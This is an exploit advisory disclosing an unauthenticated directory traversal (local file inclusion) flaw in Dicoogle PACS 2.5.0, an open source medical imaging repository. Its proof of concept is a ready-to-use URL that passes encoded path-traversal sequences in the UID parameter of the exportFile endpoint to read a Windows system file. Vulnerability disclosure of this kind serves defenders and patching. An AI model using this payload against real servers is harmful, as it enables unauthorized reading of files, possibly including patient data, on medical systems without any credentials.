# Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal
# Date: 2018-05-25
# Software Link: http://www.dicoogle.com/home
# Version: Dicoogle PACS 2.5.0-20171229_1522
# Category: webapps
# Tested on: Windows 2012 R2
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt
 
# 1. Description
# Dicoogle is an open source medical imaging repository with an extensible
# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable
# to local file inclusion. This allows an attacker to read arbitrary files that the
# web user has access to. Admin credentials aren't required. The aUIDa parameter
# via GET is vulnerable.
 
# 2. Proof of Concept
 
http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini